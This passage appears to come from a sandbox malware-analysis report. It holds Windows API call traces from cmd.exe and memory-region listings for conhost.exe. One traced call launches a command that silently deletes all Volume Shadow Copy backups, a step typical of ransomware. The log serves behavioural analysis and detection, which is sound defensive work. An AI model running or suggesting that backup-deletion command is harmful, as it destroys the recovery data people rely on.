	[0237.300] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f098) returned 0x4659568
	[0237.300] GetProcessHeap () returned 0x4650000
	[0237.300] RtlReAllocateHeap (Heap=0x4650000, Flags=0x0, Ptr=0x46578b0, Size=0x4) returned 0x4657358
	[0237.300] FindClose (in: hFindFile=0x4659568 | out: hFindFile=0x4659568) returned 1
	[0237.301] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0237.301] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0237.301] GetConsoleTitleW (in: lpConsoleTitle=0x18f58c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0237.620] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f4b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f49c | out: lpAttributeList=0x18f4b8, lpSize=0x18f49c) returned 1
	[0237.620] UpdateProcThreadAttribute (in: lpAttributeList=0x18f4b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f4a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f4b8, lpPreviousValue=0x0) returned 1
	[0237.620] GetStartupInfoW (in: lpStartupInfo=0x18f4f0 | out: lpStartupInfo=0x18f4f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0237.620] GetProcessHeap () returned 0x4650000
	[0237.620] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0x18) returned 0x4657af0
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0237.621] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0237.622] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0237.623] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0237.623] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0237.623] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0237.623] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0237.623] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0237.623] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0237.623] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0237.623] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0237.623] GetProcessHeap () returned 0x4650000
	[0237.623] RtlFreeHeap (HeapHandle=0x4650000, Flags=0x0, BaseAddress=0x4657af0) returned 1
	[0237.623] GetProcessHeap () returned 0x4650000
	[0237.623] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0xa) returned 0x4659568
	[0237.623] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0237.627] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=Y: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f440*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=Y: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f48c | out: lpCommandLine="vssadmin  Delete Shadows /For=Y: /All /Quiet ", lpProcessInformation=0x18f48c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1028, dwThreadId=0x1034)) returned 1
	[0237.647] CloseHandle (hObject=0xa4) returned 1
	[0237.647] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0237.647] GetProcessHeap () returned 0x4650000
	[0237.647] RtlFreeHeap (HeapHandle=0x4650000, Flags=0x0, BaseAddress=0x465adf0) returned 1
	[0237.647] GetEnvironmentStringsW () returned 0x465a248*
	[0237.647] GetProcessHeap () returned 0x4650000
	[0237.647] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0xb9c) returned 0x465adf0
	[0237.647] memcpy (in: _Dst=0x465adf0, _Src=0x465a248, _Size=0xb9c | out: _Dst=0x465adf0) returned 0x465adf0
	[0237.647] FreeEnvironmentStringsA (penv="=") returned 1
	[0237.647] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0256.365] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f424 | out: lpExitCode=0x18f424*=0x2) returned 1
	[0256.366] CloseHandle (hObject=0xa8) returned 1
	[0256.367] _vsnwprintf (in: _Buffer=0x18f50c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f42c | out: _Buffer="00000002") returned 8
	[0256.368] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0256.369] GetProcessHeap () returned 0x4650000
	[0256.370] RtlFreeHeap (HeapHandle=0x4650000, Flags=0x0, BaseAddress=0x465adf0) returned 1
	[0256.370] GetEnvironmentStringsW () returned 0x465a248*
	[0256.370] GetProcessHeap () returned 0x4650000
	[0256.370] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0xbc2) returned 0x465c568
	[0256.370] memcpy (in: _Dst=0x465c568, _Src=0x465a248, _Size=0xbc2 | out: _Dst=0x465c568) returned 0x465c568
	[0256.370] FreeEnvironmentStringsA (penv="=") returned 1
	[0256.370] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0256.370] GetProcessHeap () returned 0x4650000
	[0256.371] RtlFreeHeap (HeapHandle=0x4650000, Flags=0x0, BaseAddress=0x465c568) returned 1
	[0256.371] GetEnvironmentStringsW () returned 0x465a248*
	[0256.371] GetProcessHeap () returned 0x4650000
	[0256.371] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0xbc2) returned 0x465c568
	[0256.371] memcpy (in: _Dst=0x465c568, _Src=0x465a248, _Size=0xbc2 | out: _Dst=0x465c568) returned 0x465c568
	[0256.372] FreeEnvironmentStringsA (penv="=") returned 1
	[0256.372] GetProcessHeap () returned 0x4650000
	[0256.372] RtlFreeHeap (HeapHandle=0x4650000, Flags=0x0, BaseAddress=0x4659568) returned 1
	[0256.372] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f4b8 | out: lpAttributeList=0x18f4b8) 
	[0256.372] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0256.372] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0256.541] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0256.541] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0256.719] _get_osfhandle (_FileHandle=0) returned 0x38
	[0256.719] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0256.967] SetConsoleInputExeNameW () returned 0x1
	[0256.967] GetConsoleOutputCP () returned 0x1b5
	[0257.082] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0257.082] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0257.414] exit (_Code=2) 

Thread:
	id = 58
	os_tid = 0x1350


Process:
	id = "9"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x33eb5000"
	os_pid = "0xdf4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "8"
	os_parent_pid = "0xdcc"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 704
	        start_va = 0x13000000
	          end_va = 0x131fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000013000000"
	        filename = ""

Region:
	              id = 705
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 706
	        start_va = 0xd112f70000
	          end_va = 0xd112faffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d112f70000"
	        filename = ""

Region:
	              id = 707
	        start_va = 0xd113000000
	          end_va = 0xd1131fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d113000000"
	        filename = ""

Region:
	              id = 708
	        start_va = 0x23219760000
	          end_va = 0x2321977ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000023219760000"
	        filename = ""

Region:
	              id = 709
	        start_va = 0x23219780000
	          end_va = 0x23219794fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000023219780000"
	        filename = ""

Region:
	              id = 710
	        start_va = 0x7df5ff650000
	          end_va = 0x7ff5ff64ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff650000"
	        filename = ""

Region:
	              id = 711
	        start_va = 0x7ff7fef80000
	          end_va = 0x7ff7fefa2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fef80000"
	        filename = ""

Region:
	              id = 712
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 713
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 714
	        start_va = 0x232197a0000
	          end_va = 0x23219a4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000232197a0000"
	        filename = ""

Region:
	              id = 715
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 733
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 734
	        start_va = 0x23219760000
	          end_va = 0x2321976ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000023219760000"
	        filename = ""

Region:
	              id = 735
	        start_va = 0x7ff7fee80000
	          end_va = 0x7ff7fef7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fee80000"
	        filename = ""

Region:
	              id = 736
	        start_va = 0x232197a0000
	          end_va = 0x2321985dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 737
	        start_va = 0x23219950000
	          end_va = 0x23219a4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000023219950000"
	        filename = ""

Region:
	              id = 760
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 761
	        start_va = 0xd112fb0000
	          end_va = 0xd112feffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d112fb0000"
	        filename = ""

Region:
	              id = 762
	        start_va = 0x23219860000
	          end_va = 0x2321987ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000023219860000"
	        filename = ""

Region:
	              id = 763
	        start_va = 0x23219770000
	          end_va = 0x23219776fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000023219770000"
	        filename = ""

Region:
	              id = 764
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 765
	        start_va = 0x23219860000
	          end_va = 0x23219860fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000023219860000"
	        filename = ""

Region:
	              id = 766
	        start_va = 0x23219870000
	          end_va = 0x2321987ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000023219870000"
	        filename = ""

Region:
	              id = 767
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 768
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 769
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 770
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 771
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 772
	        start_va = 0x23219880000
	          end_va = 0x23219886fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000023219880000"
	        filename = ""

Region:
	              id = 773
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 783
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 784
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 785
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 786
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 827
	        start_va = 0x23219890000
	          end_va = 0x23219890fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000023219890000"
	        filename = ""

Region:
	              id = 828
	        start_va = 0x232198a0000
	          end_va = 0x232198a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000232198a0000"
	        filename = ""

Region:
	              id = 829
	        start_va = 0x23219a50000
	          end_va = 0x23219bd7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000023219a50000"
	        filename = ""

Region:
	              id = 830
	        start_va = 0x23219be0000
	          end_va = 0x23219d60fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000023219be0000"
	        filename = ""

Region:
	              id = 831
	        start_va = 0x23219d70000
	          end_va = 0x2321b16ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000023219d70000"
	        filename = ""

Region:
	              id = 832
	        start_va = 0x2321b170000
	          end_va = 0x2321b2cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002321b170000"
	        filename = ""

Region:
	              id = 854
	        start_va = 0xd113200000
	          end_va = 0xd11323ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d113200000"
	        filename = ""

Region:
	              id = 855
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 856
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 857
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 892
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 893
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 894
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 895
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 896
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 897
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 924
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 925
	        start_va = 0x2321b170000
	          end_va = 0x2321b23ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002321b170000"
	        filename = ""

Region:
	              id = 926
	        start_va = 0x2321b2c0000
	          end_va = 0x2321b2cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002321b2c0000"
	        filename = ""

Region:
	              id = 985
	        start_va = 0x2321b2d0000
	          end_va = 0x2321b606fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 986
	        start_va = 0x232198b0000
	          end_va = 0x23219909fff
	       monitored = 1
	     entry_point = 0x232198c53f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 987
	        start_va = 0x23219910000
	          end_va = 0x23219930fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 1010
	        start_va = 0x2321b610000
	          end_va = 0x2321b824fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002321b610000"
	        filename = ""

Region:
	              id = 1038
	        start_va = 0x2321b830000
	          end_va = 0x2321ba49fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002321b830000"
	        filename = ""

Region:
	              id = 1039
	        start_va = 0x2321ba50000
	          end_va = 0x2321bb5afff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002321ba50000"
	        filename = ""

Region:
	              id = 1040
	        start_va = 0x2321bb60000
	          end_va = 0x2321bd7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002321bb60000"
	        filename = ""

Region:
	              id = 1060
	        start_va = 0x2321bd80000
	          end_va = 0x2321be8efff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002321bd80000"
	        filename = ""

Region:
	              id = 1118
	        start_va = 0xd113240000
	          end_va = 0xd11327ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d113240000"
	        filename = ""

Region:
	              id = 1119
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 1120
	        start_va = 0x232198b0000
	          end_va = 0x232198b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000232198b0000"
	        filename = ""

Region:
	              id = 1121
	        start_va = 0x2321b170000
	          end_va = 0x2321b22bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002321b170000"
	        filename = ""

Region:
	              id = 1122
	        start_va = 0x2321b230000
	          end_va = 0x2321b23ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002321b230000"
	        filename = ""

Region:
	              id = 1123
	        start_va = 0x232198b0000
	          end_va = 0x232198b3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000232198b0000"
	        filename = ""

Region:
	              id = 1124
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 1137
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
